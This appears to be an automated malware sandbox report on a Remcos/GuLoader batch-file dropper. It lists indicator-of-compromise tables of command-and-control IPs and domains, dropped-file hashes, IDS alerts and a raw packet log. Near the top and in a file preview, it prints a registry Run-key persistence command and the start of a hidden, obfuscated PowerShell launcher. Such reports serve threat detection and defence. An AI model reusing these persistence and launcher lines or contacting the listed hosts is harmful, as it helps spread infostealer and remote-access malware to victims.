09:40:43  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Forsnakket154 %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)
Match, Associated Sample Name / URL, Detection, Threat Name, Context:
Match: 104.21.56.189
• rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat (malicious: Remcos, GuLoader)
• rIMGTR657365756.bat (malicious: Remcos, GuLoader)
Match: 178.237.33.50
• DHLShippingInvoicesAwbBL000000000102220242247.vbs (malicious: Remcos; context: geoplugin.net/json.gp)
• DHL AWB_NO_92847309329.exe (malicious: PureLog Stealer, Remcos; context: geoplugin.net/json.gp)
• Order_MG2027176.vbs (malicious: Remcos, GuLoader; context: geoplugin.net/json.gp)
• Salary Revision_pdf.vbs (malicious: Remcos, GuLoader; context: geoplugin.net/json.gp)
• Scanned_22C-6e24090516030.pdf.vbs (malicious: Remcos, GuLoader; context: geoplugin.net/json.gp)
• Order.vbs (malicious: Remcos; context: geoplugin.net/json.gp)
• rIMG465244247443GULFORDEROpmagasinering.cmd (malicious: Remcos, GuLoader; context: geoplugin.net/json.gp)
• 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe (malicious: Remcos; context: geoplugin.net/json.gp)
• duEsmKBlGr.exe (malicious: Unknown; context: www.geoplugin.net/xml.gp?ip=SEU_IP)
• lA0Z0vjXfA.exe (malicious: Unknown; context: www.geoplugin.net/xml.gp?ip=SEU_IP)
Match, Associated Sample Name / URL, Detection, Threat Name, Context:
Match: plieltd.top
• rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat (malicious: Remcos, GuLoader; context: 104.21.56.189)
• IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs (malicious: Remcos, GuLoader; context: 172.67.155.139)
• rIMG465244247443GULFORDEROpmagasinering.cmd (malicious: Remcos, GuLoader; context: 172.67.155.139)
• rIMGTR657365756.bat (malicious: Remcos, GuLoader; context: 104.21.56.189)
Match: geoplugin.net
• DHLShippingInvoicesAwbBL000000000102220242247.vbs (malicious: Remcos; context: 178.237.33.50)
• DHL AWB_NO_92847309329.exe (malicious: PureLog Stealer, Remcos; context: 178.237.33.50)
• Order_MG2027176.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Salary Revision_pdf.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Scanned_22C-6e24090516030.pdf.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Order.vbs (malicious: Remcos; context: 178.237.33.50)
• rIMG465244247443GULFORDEROpmagasinering.cmd (malicious: Remcos, GuLoader; context: 178.237.33.50)
• 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe (malicious: Remcos; context: 178.237.33.50)
Match, Associated Sample Name / URL, Detection, Threat Name, Context:
Match: CLOUDFLARENETUS
• TT Swift copy1.exe (malicious: FormBook; context: 188.114.96.3)
• https://freeaccessonline.mystrikingly.com/ (malicious: Unknown; context: 104.17.25.14)
• file.exe (malicious: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 104.21.53.8)
• PO1268931024 - Bank Slip.exe (malicious: PureLog Stealer; context: 188.114.96.3)
• Quotation_final_buy_order_list_2024_po_nos_ART125673211020240000000000024.bat (malicious: GuLoader; context: 188.114.96.3)
• TicariXHesapXXzetiniz.exe (malicious: GuLoader, Snake Keylogger; context: 188.114.97.3)
• MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zip (malicious: Unknown; context: 172.64.41.3)
• REVISED PROFORMA INVOICE STVC007934196.exe (malicious: Snake Keylogger, VIP Keylogger; context: 188.114.96.3)
• MT103-539 PAYMENT (1).docx.doc (malicious: PureLog Stealer, Snake Keylogger, VIP Keylogger; context: 188.114.96.3)
• PaymentXConfirmationXcopy.xls (malicious: Snake Keylogger; context: 188.114.96.3)
Match: ATOM86-ASATOM86NL
• DHLShippingInvoicesAwbBL000000000102220242247.vbs (malicious: Remcos; context: 178.237.33.50)
• ceTv2SnPn9.elf (malicious: Mirai; context: 85.222.236.220)
• DHL AWB_NO_92847309329.exe (malicious: PureLog Stealer, Remcos; context: 178.237.33.50)
• Order_MG2027176.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Salary Revision_pdf.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Scanned_22C-6e24090516030.pdf.vbs (malicious: Remcos, GuLoader; context: 178.237.33.50)
• Order.vbs (malicious: Remcos; context: 178.237.33.50)
• rIMG465244247443GULFORDEROpmagasinering.cmd (malicious: Remcos, GuLoader; context: 178.237.33.50)
• 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe (malicious: Remcos; context: 178.237.33.50)
• duEsmKBlGr.exe (malicious: Unknown; context: 178.237.33.50)
Match: COGENT-174US
• PO1268931024 - Bank Slip.exe (malicious: PureLog Stealer; context: 38.88.82.56)
• la.bot.powerpc.elf (malicious: Mirai; context: 38.58.105.199)
• la.bot.sparc.elf (malicious: Unknown; context: 38.64.166.57)
• la.bot.mips.elf (malicious: Unknown; context: 154.22.18.20)
• la.bot.sparc.elf (malicious: Unknown; context: 149.100.195.183)
• na.elf (malicious: Unknown; context: 38.179.31.249)
• M3Llib2vh3.elf (malicious: Mirai; context: 38.53.78.115)
• bin.i686.elf (malicious: Gafgyt, Mirai; context: 199.99.120.181)
• 0dWzJvs4ON.elf (malicious: Mirai; context: 38.93.7.181)
• bin.armv7l.elf (malicious: Mirai; context: 149.33.65.208)
Match, Associated Sample Name / URL, Detection, Threat Name, Context:
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• Quotation_final_buy_order_list_2024_po_nos_ART125673211020240000000000024.bat (malicious: GuLoader; context: 104.21.56.189)
• TicariXHesapXXzetiniz.exe (malicious: GuLoader, Snake Keylogger; context: 104.21.56.189)
• REVISED PROFORMA INVOICE STVC007934196.exe (malicious: Snake Keylogger, VIP Keylogger; context: 104.21.56.189)
• PO FOR CONNECTOR WITH TERMINAL.exe (malicious: AgentTesla, PureLog Stealer, zgRAT; context: 104.21.56.189)
• PO 0039499059996600 dtated 10222024.exe (malicious: AgentTesla; context: 104.21.56.189)
• Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbs (malicious: GuLoader; context: 104.21.56.189)
• SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe (malicious: PureLog Stealer, Snake Keylogger, VIP Keylogger; context: 104.21.56.189)
• rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat (malicious: Remcos, GuLoader; context: 104.21.56.189)
• z1DHL_Shipping_.cmd (malicious: GuLoader; context: 104.21.56.189)
• DHLShippingInvoicesAwbBL000000000102220242247.vbs (malicious: Remcos; context: 104.21.56.189)
Match: 37f463bf4616ecd445d4a1937da06e19
• TicariXHesapXXzetiniz.exe (malicious: GuLoader, Snake Keylogger; context: 104.21.56.189)
• MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zip (malicious: Unknown; context: 104.21.56.189)
• rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat (malicious: Remcos, GuLoader; context: 104.21.56.189)
• Reminder.exe (malicious: Amadey; context: 104.21.56.189)
• P4.exe (malicious: XRed; context: 104.21.56.189)
• Order_MG2027176.vbs (malicious: Remcos, GuLoader; context: 104.21.56.189)
• Salary Revision_pdf.vbs (malicious: Remcos, GuLoader; context: 104.21.56.189)
• Scanned_22C-6e24090516030.pdf.vbs (malicious: Remcos, GuLoader; context: 104.21.56.189)
• Ricevuta_di_pagamento.vbs (malicious: GuLoader; context: 104.21.56.189)
• 8VYDvQtXBH.exe (malicious: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc; context: 104.21.56.189)
No context

Process: C:\Windows\SysWOW64\msiexec.exe
File Type: JSON data
Category: dropped
Size (bytes): 957
Entropy (8bit): 5.009232287567204
Encrypted: false
SSDEEP: 12:tkdGnd61GkMyGWKyGXPVGArwY3OHfv+oQasHuGHmArpv/mOAaNO+ao9W7iN5zzkr:qsdluKyGX85jHf3SvXhNlT3/7YvfbYro
MD5: 097A4F4FAD24E3771DEF7A30207C7ACA
SHA1: 261E2276DA9A35B6F01AC78CB096B30BCF795F97
SHA-256: 032666ADE91EF58519500EF6C73723EAF1BDA14A796CF9D646B31C26AF9446B4
SHA-512: 16EE192FB0B85A7982244E45C28338764249CF3618D80D88CB04B5FB4239E95B86D5B21388286FB5B1DE43E1D5227D5759D85A7D9E65CA4AEA03E01C999F5C27
Malicious: false
Preview: {. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x5ad2f074, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):17301504
                                                                                                Entropy (8bit):1.0258660186081168
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:zvQXf7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkoz:3yUt3F0TkT0TAitKxK9JdAE4AgC
                                                                                                MD5:0772451D34828FAC54B2A7B163043341
                                                                                                SHA1:00DB955F7E8A88DDBB8C2CAAC760A621A5F7D219
                                                                                                SHA-256:E0622604581DBC7EE2F30DDD810048C32D67185311BE7F612A95F29DE7E28F56
                                                                                                SHA-512:05ACDA4289D21F76F3B7DA156496E333FDF231757C259525B018B8BFDB4DA34E6FC510C8CE661B2FEBE1002F9C1E96BFC4F5FA4B8B33E8CCDAF02BAD005D4BB5
                                                                                                Malicious:false
                                                                                                Preview:Z..t... .......4.........gN;....{........................&....../...{..!(...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................|K.(!(...|..................3...!(...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2
                                                                                                Entropy (8bit):1.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Qn:Qn
                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                Malicious:false
                                                                                                Preview:..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6224
                                                                                                Entropy (8bit):3.7234688293946614
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:shhrD2lKtyH3CyXU2U2nukvhkvklCywM0OblvlHJLSogZoYUOblvlLLSogZo81:8oH3CvT1kvhkvCCtROblvyHOOblvIHT
                                                                                                MD5:CCF33094D958C06585B867596DFD7270
                                                                                                SHA1:DC385C564A84F21BCB51D4DAD452C6A02C85D34D
                                                                                                SHA-256:E707A95FABB205F221C4F506E33A8F0156D7499C69E5F49C9AA66C60690872BE
                                                                                                SHA-512:180444F7FDBF2F353C6337D6C18069FD63DC5AE6BB728365859A603A27D6449F0CF558E26974A52A40A3F2154AEAD4C5D67F6B7ACA0BB5636901654399632D57
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...J.S.......U$..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...Yc..U$..c...U$......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2VY.<...........................^.A.p.p.D.a.t.a...B.V.1.....VY.<..Roaming.@......EW<2VY.<..../......................S..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2VY.<....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2VY.<....2......................M].W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2VY.<....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2VY.<....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2VY.=....u...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6224
                                                                                                Entropy (8bit):3.7234688293946614
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:shhrD2lKtyH3CyXU2U2nukvhkvklCywM0OblvlHJLSogZoYUOblvlLLSogZo81:8oH3CvT1kvhkvCCtROblvyHOOblvIHT
                                                                                                MD5:CCF33094D958C06585B867596DFD7270
                                                                                                SHA1:DC385C564A84F21BCB51D4DAD452C6A02C85D34D
                                                                                                SHA-256:E707A95FABB205F221C4F506E33A8F0156D7499C69E5F49C9AA66C60690872BE
                                                                                                SHA-512:180444F7FDBF2F353C6337D6C18069FD63DC5AE6BB728365859A603A27D6449F0CF558E26974A52A40A3F2154AEAD4C5D67F6B7ACA0BB5636901654399632D57
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...J.S.......U$..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...Yc..U$..c...U$......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2VY.<...........................^.A.p.p.D.a.t.a...B.V.1.....VY.<..Roaming.@......EW<2VY.<..../......................S..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2VY.<....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2VY.<....2......................M].W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2VY.<....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2VY.<....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2VY.=....u...........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):494580
                                                                                                Entropy (8bit):5.836154249707592
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:/QnkugcWPfbovD25yPJCXDIUAkTrqpUIcr9:/vugcWP8vDYOJmvSU79
                                                                                                MD5:39858943E5706782A2E5B0C5791511DE
                                                                                                SHA1:AC3BA663425EDCC14C79B58D933F6DD6AD46DEC4
                                                                                                SHA-256:1E187E2094F3AECA9A210E974CDDAF48521CED815F2127CAD6DF88FE1CB26F96
                                                                                                SHA-512:9C4BF3856AA9DEB997E390812711EF7091772DCD46594BD0F1FCFBDDD75FB68A6FFF2E8280335C3EA749F2CC0849A5274471E1DAA7E50B2587B8EEA41390184E
                                                                                                Malicious:false
Preview:
                                                                                                File type:ASCII text, with very long lines (6231), with no line terminators
                                                                                                Entropy (8bit):5.328205534518685
                                                                                                TrID:
                                                                                                  File name:LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
                                                                                                  File size:6'231 bytes
                                                                                                  MD5:79c452316f1b510462cf29f5fbbd84ba
                                                                                                  SHA1:2f95ab9367e8ef18427e2a8568afffbe0f197f22
                                                                                                  SHA256:4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959
                                                                                                  SHA512:9db2ed31b8fa24d38549707002fff53fc255630dca2b08c2c335816cabef1f57a4ab96fe01f41d65818a0cc58ecca770cb7c5697adbb65e3df53d7fe9f2c04e9
                                                                                                  SSDEEP:192:zQTm8sMkAEm+nTPTBylI9lCu8JHDyOrhZT:zQTxkllTPVmICu8YOtJ
                                                                                                  TLSH:35D14B08A9A627960EA63E846C47D4019F5D05967C6C90F2FBA48B8D3405F20FB7CFB5
                                                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare
                                                                                                  Icon Hash:9686878b929a9886
Timestamp                        SID      Signature                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-22T09:40:36.573377+0200  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.6  49846        104.21.56.189   443        TCP
2024-10-22T09:40:42.309016+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.6  49881        143.244.46.150  51525      TCP
2024-10-22T09:40:43.893685+0200  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa   3         192.168.2.6  49893        178.237.33.50   80         TCP
2024-10-22T09:40:44.230804+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.6  49892        143.244.46.150  51525      TCP
Timestamp                              Source Port  Dest Port  Source IP      Dest IP
Oct 22, 2024 09:40:04.112433910 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.112485886 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:04.112713099 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.121814966 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.121855021 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:04.756637096 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:04.756943941 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.766136885 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.766175985 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:04.766632080 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:04.773333073 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:04.815331936 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254559994 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254648924 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254695892 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254793882 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254823923 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.254838943 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254853010 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.254853010 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.254900932 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.255364895 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.309010983 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.309041977 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.355951071 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.374557972 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.418524027 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.418555021 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.423544884 CEST   443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:05.423643112 CEST   49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:05.423652887 CEST   443          49710      104.21.56.189  192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.423753023 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.423800945 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.423806906 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.423974037 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.424021959 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.424030066 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.424052954 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.424093962 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.424144030 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.465269089 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.494191885 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.543418884 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.543493986 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.543710947 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.543889046 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.543890953 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.543925047 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.543975115 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.543998957 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.544195890 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.544251919 CEST49710443192.168.2.6104.21.56.189
